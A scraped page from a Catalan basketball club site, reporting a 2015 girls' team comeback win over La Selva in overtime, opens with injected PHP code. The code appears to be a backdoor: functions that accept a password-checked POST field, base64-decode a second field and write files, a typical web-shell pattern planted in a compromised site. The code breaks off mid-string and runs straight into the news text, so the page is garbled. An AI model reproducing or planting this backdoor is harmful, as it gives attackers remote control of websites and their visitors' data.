function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení P remunta 15 punts i guanya La Selva a la pròrroga (53-47) - Tgn Bàsquet Club -

L’infantil femení P remunta 15 punts i guanya La Selva a la pròrroga (53-47)

Updated: desembre 24, 2015

L’infantil femení P va aconseguir una victòria de mèrit després de remuntar 15 punts i vèncer La Selva a la pròrroga. El conjunt lila no va fer un bon inici de partit. La defensa de les locals no era prou intensa i en atac, tot i treballar molt bé les diferents situacions, es cometien massa errades en el tir. Així, en el minut 18 de partit el resultat era de 10-25. Tot i que en la segona meitat l’encert ofensiu del TGN Bàsquet no va millorar massa, la gran defensa i la lluita de les locals va permetre retallar diferències i forçar la pròrroga (44-44). En el temps extra, el TGN Bàsquet va ser millor.